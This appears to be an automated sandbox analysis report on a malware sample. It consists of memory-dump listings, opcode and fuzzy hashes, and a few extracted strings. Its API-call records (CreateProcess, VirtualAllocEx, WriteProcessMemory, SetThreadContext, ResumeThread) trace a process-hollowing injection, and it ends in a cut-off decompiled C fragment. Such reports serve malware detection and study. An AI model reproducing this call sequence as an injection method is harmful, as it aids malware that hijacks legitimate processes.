                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: &$-$.$=$?$F$N$U$\$_$h$m$t
                                                                                                                                                            • API String ID: 0-2137078230
                                                                                                                                                            • Opcode ID: 839e50b4ac0fdc3ac0cb08132571bfbfae562d784f47d5fb94d1a5b9d4de37ec
                                                                                                                                                            • Instruction ID: 7eff69cb8ebe463e5e924462eea519826c84e6ed45338abc29409fd6c930077a
                                                                                                                                                            • Opcode Fuzzy Hash: 839e50b4ac0fdc3ac0cb08132571bfbfae562d784f47d5fb94d1a5b9d4de37ec
                                                                                                                                                            • Instruction Fuzzy Hash: 6582F671C05368CEDB29CFA2C9583EDFAB8BB45349F149099C24977692C7784AC8DF18
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: #$'$+$:$=$@$J$l$p$w
                                                                                                                                                            • API String ID: 0-44647363
                                                                                                                                                            • Opcode ID: 0b5fc37b1109fc0f83bc11deb6b1507f675bb8aaf3fb70f43fc9bb79202ec873
                                                                                                                                                            • Instruction ID: 0c34ac28122e358e350f6bc28043bf51ca18e2897bb5431935a2b920f36471cb
                                                                                                                                                            • Opcode Fuzzy Hash: 0b5fc37b1109fc0f83bc11deb6b1507f675bb8aaf3fb70f43fc9bb79202ec873
                                                                                                                                                            • Instruction Fuzzy Hash: 72820671C05268CEDB29CFA2C9593EDFAB8BB45349F1490D9C209B7692C7784AC8DF14
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,GOj$JOj
                                                                                                                                                            • API String ID: 0-3716394560
                                                                                                                                                            • Opcode ID: 9121222c88272ff60eb40dcb43bee94eb9b55b8cab6d0cee1cc6d8eae56ebaf4
                                                                                                                                                            • Instruction ID: 9b6ec63fc92557bcc578737e3d6ceceac4c4d6f2c2b7fe2fd70e19c1b6885b1e
                                                                                                                                                            • Opcode Fuzzy Hash: 9121222c88272ff60eb40dcb43bee94eb9b55b8cab6d0cee1cc6d8eae56ebaf4
                                                                                                                                                            • Instruction Fuzzy Hash: CC02D1B0D00229CFDF24DFA8C881BDDBBB1BB49304F1485AAD819B7250EB749A95CF55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: JOj
                                                                                                                                                            • API String ID: 0-2362757868
                                                                                                                                                            • Opcode ID: 59ecac7c89f8ec58276fe7f9fe4379b1e24cc779310ffaa6c151e15818568f6d
                                                                                                                                                            • Instruction ID: afcc08ed9d5a49b1e16f9e1207a383c9a4ee871c8bd329607b6ada53e8720454
                                                                                                                                                            • Opcode Fuzzy Hash: 59ecac7c89f8ec58276fe7f9fe4379b1e24cc779310ffaa6c151e15818568f6d
                                                                                                                                                            • Instruction Fuzzy Hash: C1F1E1B0D14219CFDF24DFA8C885BDDBBB2FB48304F1485AAD809A7250EB749A85CF55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: d772540b2309eb70d877356f211964c04bfdc5b05a462dfa623e02e4721e8d69
                                                                                                                                                            • Instruction ID: aa8c3037a7adf4990c55f976846819c7e9210af0683af6abe0c1b01dc94d3e03
                                                                                                                                                            • Opcode Fuzzy Hash: d772540b2309eb70d877356f211964c04bfdc5b05a462dfa623e02e4721e8d69
                                                                                                                                                            • Instruction Fuzzy Hash: 17711574E041099FCB05DFE9C5456EEBBF6EF88319F54C525E908EB748DB3099428BA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 36efe93a8f691fee166b3be633ff9d5698c04c79ff4217ec0223774fbdbfc8d6
                                                                                                                                                            • Instruction ID: 6c0d88f85a2d0731e02f93021a766fb7e8da1782c1862f9490c6b4d242f8b3f9
                                                                                                                                                            • Opcode Fuzzy Hash: 36efe93a8f691fee166b3be633ff9d5698c04c79ff4217ec0223774fbdbfc8d6
                                                                                                                                                            • Instruction Fuzzy Hash: 58610471E002099BDF09DFEAC8406DEBBB6FFD8319F64C529D508AB614EB3159028F60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 008907CF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                            • Opcode ID: 68e0878aa5637601fa9847670e4d55aa2c34d041948ba64488eef27c9d6564d1
                                                                                                                                                            • Instruction ID: 12b49a287ed2efc1cfed96e4c6011759b0eeba303f29ed5a6bd7256662ca32b7
                                                                                                                                                            • Opcode Fuzzy Hash: 68e0878aa5637601fa9847670e4d55aa2c34d041948ba64488eef27c9d6564d1
                                                                                                                                                            • Instruction Fuzzy Hash: E7C11E70D0026D8FDF21DFA4C841BEDBBB1BB49304F1496AAD949B7240DB709A85CF95
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 008907CF
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                            • Opcode ID: ab5e70bcffeb2a2e74c9b089af3fc6e9ea9fc8e9ef94a3c013ff8ff82d18f3e1
                                                                                                                                                            • Instruction ID: 539c92484e20af395256aa7708a86c489cf8fbf2acbd6c520dc5eef98c882cb1
                                                                                                                                                            • Opcode Fuzzy Hash: ab5e70bcffeb2a2e74c9b089af3fc6e9ea9fc8e9ef94a3c013ff8ff82d18f3e1
                                                                                                                                                            • Instruction Fuzzy Hash: D4C10E70D0026D8FDF24DFA4C841BEDBBB1BB49304F1496AAD949B7240DB709A858F95
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 008900F2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                            • Opcode ID: 23e0c2e8b4158bf8cabc4d485c19946f81b4d73491dbb43751abff1fc57df15e
                                                                                                                                                            • Instruction ID: 8d779c2b5be7db8b31a33b18054c6d269e55215d6ef3de4311551963a24c9763
                                                                                                                                                            • Opcode Fuzzy Hash: 23e0c2e8b4158bf8cabc4d485c19946f81b4d73491dbb43751abff1fc57df15e
                                                                                                                                                            • Instruction Fuzzy Hash: 6241EEB5D04288DFCF11CFA9D840AEEBBB0FF1A304F14946AE915AB211D774A906CF55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00890243
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                            • Opcode ID: 327e2c4fb418537baf37f753a6f903c4002f5d440802ecc48fc33b7835a4bdcf
                                                                                                                                                            • Instruction ID: 61fc616e4d58a26688d99bbc905e0dd3d7e13838d7a59427e45c9d8d575a4b8a
                                                                                                                                                            • Opcode Fuzzy Hash: 327e2c4fb418537baf37f753a6f903c4002f5d440802ecc48fc33b7835a4bdcf
                                                                                                                                                            • Instruction Fuzzy Hash: 4741BBB5D012589FCF00CFE9D984AEEBBB5BB49304F24942AE814B7210D774AA45CF64
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00890243
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                            • Opcode ID: 2d8f0ef6d2c5fd7e16489e0bca017cde91c53eb0c6cc90795a64b14f9bdb0ddf
                                                                                                                                                            • Instruction ID: 653adaef5b02dbfae6a4763713c62cd8571236c0ef14ab151591d415f1051a31
                                                                                                                                                            • Opcode Fuzzy Hash: 2d8f0ef6d2c5fd7e16489e0bca017cde91c53eb0c6cc90795a64b14f9bdb0ddf
                                                                                                                                                            • Instruction Fuzzy Hash: 314197B4D012589FCF00CFE9D984AEEBBB5BB49304F24942AE818B7250D774AA45CF64
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00890382
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                            • Opcode ID: f759af58cc65a12c539ad9d1c1e301c5873b03c6ab64fd44b6e205b2a1bb070c
                                                                                                                                                            • Instruction ID: 6cf890ac29a0758d6dd9551031db0263835d9384a40bbab6d99594f87b0152f2
                                                                                                                                                            • Opcode Fuzzy Hash: f759af58cc65a12c539ad9d1c1e301c5873b03c6ab64fd44b6e205b2a1bb070c
                                                                                                                                                            • Instruction Fuzzy Hash: AF41A8B8D002589FCF00CFAAD884AEEFBB5BF49314F14942AE815B7200D774AA45DF64
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00890382
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                            • Opcode ID: 6886fe5233da6677c222b79affca27abbf85c5ff356b48b44eb3acbc7ca51725
                                                                                                                                                            • Instruction ID: a58229ba3e661076b4f0dec0fd0ff1d7a0292df70582b9fc2db04dfa35c734c0
                                                                                                                                                            • Opcode Fuzzy Hash: 6886fe5233da6677c222b79affca27abbf85c5ff356b48b44eb3acbc7ca51725
                                                                                                                                                            • Instruction Fuzzy Hash: 5F4198B8D002589FCF00CFAAD884AEEFBB5BB49314F14942AE915B7200D775AA45DF64
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 008900F2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                            • Opcode ID: 9f52c24d7994de70fc7eb4320486d2c9fbf932380054a5a1b6f2e1375a2ca315
                                                                                                                                                            • Instruction ID: 1a150480803efeda9db72d4040226fc9400fd61bcf1e6a889af96f97e84efc08
                                                                                                                                                            • Opcode Fuzzy Hash: 9f52c24d7994de70fc7eb4320486d2c9fbf932380054a5a1b6f2e1375a2ca315
                                                                                                                                                            • Instruction Fuzzy Hash: 4641A7B8D002589FCF04CFA9D880AEEFBB5FB49314F24942AE915B7210D775A906CF64
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 003BFE6F
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                            • Opcode ID: b291198eed3457162110cfd934257d672e5bbcc96c1955180407481c9b652523
                                                                                                                                                            • Instruction ID: a7a68d924d76f45fc8fdf815f7fab1f07776797879f41d1e232506f9362fc78d
                                                                                                                                                            • Opcode Fuzzy Hash: b291198eed3457162110cfd934257d672e5bbcc96c1955180407481c9b652523
                                                                                                                                                            • Instruction Fuzzy Hash: 1D41CBB4D002189FCB14CFA9D884AEEFBF5BF48314F24942AE418B7210D778AA45CF54
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • ResumeThread.KERNELBASE(?), ref: 003BFD1E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                            • Opcode ID: 78221417271c295244f41bf9131572f7d10cb205d6672dd16c5691edd3d9b869
                                                                                                                                                            • Instruction ID: 6b25acd4fe281ae4053cdc3137aa1940195ceb8ad74991002df0f7fb5ffc50b4
                                                                                                                                                            • Opcode Fuzzy Hash: 78221417271c295244f41bf9131572f7d10cb205d6672dd16c5691edd3d9b869
                                                                                                                                                            • Instruction Fuzzy Hash: 5F319BB4D012189FCB14CFA9E884ADEFBB5AB49314F14982AE915B7200D775A941CF94
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180751372.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 34e636cd782df0bcc2328448f3d9d253dcfc84ca633dbb7b122e75d2839f988c
                                                                                                                                                            • Instruction ID: 91dac041b1dd16fb76a4a6a96de8cc05d543edbfeacb1c5e9d046b3655a28453
                                                                                                                                                            • Opcode Fuzzy Hash: 34e636cd782df0bcc2328448f3d9d253dcfc84ca633dbb7b122e75d2839f988c
                                                                                                                                                            • Instruction Fuzzy Hash: FF213770500304EFDB15CF94E5C0B26BB65FB84314F24C96DE8894B382C376D856CB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180751372.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ab758384b02c554eb5f5d78fbf97e33715824b859abfcc4ca301adaa2b2cbb16
                                                                                                                                                            • Instruction ID: b544a4a052a3dc8fb92173fe7784cd78f48876d1b841588efa21be9d456719a2
                                                                                                                                                            • Opcode Fuzzy Hash: ab758384b02c554eb5f5d78fbf97e33715824b859abfcc4ca301adaa2b2cbb16
                                                                                                                                                            • Instruction Fuzzy Hash: C6212574204304DFDB14CF94E884B16BB65EB84314F34C969E88E4B38AC376D857CB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180751372.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 12bfa8ebe33e4b9065d812a0b306cff2c68951779c0bd00fc27043ad86a6bde3
                                                                                                                                                            • Instruction ID: 2c2f70d9550787b18d4e52f50fc50241a6b3a63d250aca1118b3e520be5be5b6
                                                                                                                                                            • Opcode Fuzzy Hash: 12bfa8ebe33e4b9065d812a0b306cff2c68951779c0bd00fc27043ad86a6bde3
                                                                                                                                                            • Instruction Fuzzy Hash: EE11BE75504280CFCB11CF50E584B16BB61FB44314F28C6A9E8494B69AC37AD84ACB62
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180751372.000000000010D000.00000040.00000001.sdmp, Offset: 0010D000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 12bfa8ebe33e4b9065d812a0b306cff2c68951779c0bd00fc27043ad86a6bde3
                                                                                                                                                            • Instruction ID: 0121dd77f29b8641907b69982dfd32575192ac18f30de6f20b3f28df81a72e9c
                                                                                                                                                            • Opcode Fuzzy Hash: 12bfa8ebe33e4b9065d812a0b306cff2c68951779c0bd00fc27043ad86a6bde3
                                                                                                                                                            • Instruction Fuzzy Hash: F411DD75504280DFCB12CF54E5C4B15FFA1FB84314F28C6ADD8894B696C37AD84ACB62
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180741095.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0a9f72133d357a04534de8042256fe41dbf6d34ba34b286eb8988023a41dcb4f
                                                                                                                                                            • Instruction ID: e4c6cd87a00cd1e061a9cb830db1625656db3c66ff5f56dcfb240b49afc80b7b
                                                                                                                                                            • Opcode Fuzzy Hash: 0a9f72133d357a04534de8042256fe41dbf6d34ba34b286eb8988023a41dcb4f
                                                                                                                                                            • Instruction Fuzzy Hash: BC01D4300043489AE7A09B55C8887BBBBDCEF61724F18C41BEF041A682C378D841D6B1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180741095.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: bfb79c1b9f8dd651a006c466dcc9a8ce9b99e9eb361cd5b4b063eeaef6237a97
                                                                                                                                                            • Instruction ID: 1a1df7e142192496b486856ce0f856e09ea5a6582d34f9eccf437c3d43cdba47
                                                                                                                                                            • Opcode Fuzzy Hash: bfb79c1b9f8dd651a006c466dcc9a8ce9b99e9eb361cd5b4b063eeaef6237a97
                                                                                                                                                            • Instruction Fuzzy Hash: ABF0C2314043489EE7908F05C888B72FFD8EB61724F18C45AEE085B686C378EC40CBB0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: ,GOj$JOj
                                                                                                                                                            • API String ID: 0-3716394560
                                                                                                                                                            • Opcode ID: 4c07fa548bd07ad7f60116f786dfd08e783886e3860d02d635c345fbde434d9f
                                                                                                                                                            • Instruction ID: 8e209fc0e965a789e8e9fcb326b767fca45566d24dc361df14c90a8602423704
                                                                                                                                                            • Opcode Fuzzy Hash: 4c07fa548bd07ad7f60116f786dfd08e783886e3860d02d635c345fbde434d9f
                                                                                                                                                            • Instruction Fuzzy Hash: 6AE1E0B0D00218CFDF24DFA9C880BDDBBB2BF49304F1485AAD809A7250EB749A95CF55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2180890908.00000000003B0000.00000040.00000001.sdmp, Offset: 003B0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: @2*m
                                                                                                                                                            • API String ID: 0-3252119314
                                                                                                                                                            • Opcode ID: e10d060ba6e4002b0a64f5dc19f56036c86f7b475e4c90598b6586bb32c429b0
                                                                                                                                                            • Instruction ID: 43db54bb43a06bd08bc019572461f1c00182f1de64e02781f9d23080c32f4538
                                                                                                                                                            • Opcode Fuzzy Hash: e10d060ba6e4002b0a64f5dc19f56036c86f7b475e4c90598b6586bb32c429b0
                                                                                                                                                            • Instruction Fuzzy Hash: F451407090420D8FD748EFB9E8A4BDE7BF6AB89308F048939D1049B769DF705946CB91
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: c94114c4dc8e0b0474b239269288fff13707a065ca0e0b3e1e28f801e10bac76
                                                                                                                                                            • Instruction ID: 9902881fae4604cab4d87d54b8d38b1a952a89a31d9722337ad66c9d75dfcfae
                                                                                                                                                            • Opcode Fuzzy Hash: c94114c4dc8e0b0474b239269288fff13707a065ca0e0b3e1e28f801e10bac76
                                                                                                                                                            • Instruction Fuzzy Hash: 1F41EBB0D0024CAFDF14DFA9D885BADBBB1FB09304F28902AE415AB251D7749885CF95
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 37517aaeb8c19b365d7ec0aa98f64ed4eec590bb07289bd27e23ba36077deb45
                                                                                                                                                            • Instruction ID: 2a2f36afa4d45f59b73354f43904ea2e0f0d5be817cae136e2de2e0aeac01637
                                                                                                                                                            • Opcode Fuzzy Hash: 37517aaeb8c19b365d7ec0aa98f64ed4eec590bb07289bd27e23ba36077deb45
                                                                                                                                                            • Instruction Fuzzy Hash: 5B41ECB4D0020CEFDF14DFA9D885AADBBB5FF09304F28902AE815AB251D7749885CF85
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 8a703f2653bb10eeea5ed4e340c2567d587d78fc118a321c1727e086563e9923
                                                                                                                                                            • Instruction ID: 6372a20dac382c76e9e613f1e1b3aba4c5c97e06ae11b2e9205562007722bd24
                                                                                                                                                            • Opcode Fuzzy Hash: 8a703f2653bb10eeea5ed4e340c2567d587d78fc118a321c1727e086563e9923
                                                                                                                                                            • Instruction Fuzzy Hash: BA312D70D44629CBDF29DF6BC8047EABAF2BF8A304F18C1BA8459A7254DB740985DF05
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 946644bca4cbffeb3e370c7d59a23a7caaef93e25bce39324daee2bb40e1b26d
                                                                                                                                                            • Instruction ID: a383d0c525682648046558f93ffd5daf3fd2ab726032949942503c0646975de5
                                                                                                                                                            • Opcode Fuzzy Hash: 946644bca4cbffeb3e370c7d59a23a7caaef93e25bce39324daee2bb40e1b26d
                                                                                                                                                            • Instruction Fuzzy Hash: B5118E71D05259CFDF029BB8C818BFDBBF0BB4A305F1840AAD495B7291C7784944CB64
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2181066847.0000000000890000.00000040.00000001.sdmp, Offset: 00890000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: a964682aa7c917f2ba11a017a4e4067dc9fd33b4b8706d464b36413ff5f1cc2a
                                                                                                                                                            • Instruction ID: 8307efb722ee8c88c5bcb2e4434915acaf8f34d198123c8644c9675ec75b40f1
                                                                                                                                                            • Opcode Fuzzy Hash: a964682aa7c917f2ba11a017a4e4067dc9fd33b4b8706d464b36413ff5f1cc2a
                                                                                                                                                            • Instruction Fuzzy Hash: B8115A30D052598BDF04DFA9C808BEEBBF1BB4E305F189069E455B3290C7788984DA68
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Executed Functions

                                                                                                                                                            APIs
                                                                                                                                                            • NtQueryInformationProcess.NTDLL ref: 003D99BF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2216874701.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InformationProcessQuery
                                                                                                                                                            • String ID: 0
                                                                                                                                                            • API String ID: 1778838933-4108050209
                                                                                                                                                            • Opcode ID: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                                                                                                                            • Instruction ID: 48ce2ad5399bc2d742acbb03df688de21a20a30149207ab9f8f36562cf986f38
                                                                                                                                                            • Opcode Fuzzy Hash: 39eb83527b9dfb0958a03f1802a1a4be67d21b07a2af987d97fec1c560f0ff77
                                                                                                                                                            • Instruction Fuzzy Hash: 72F16371528A4C8FDB66EF68D894AEEB7E1FF98304F40462AE44ECB251DF309641CB41
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 37%
                                                                                                                                                            			E00419DB2(void* _a4, void* _a8, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40, void* _a44) {
                                                                                                                                                            				char _v1;
                                                                                                                                                            				char* _t59;
                                                                                                                                                            
                                                                                                                                                            				asm("rcl dword [ebx+0x5f], 0xe3");
                                                                                                                                                            				_t59 =  &_v1;
                                                                                                                                                            				if (_t59 == 0) goto L3;
                                                                                                                                                            				_push(_t59);
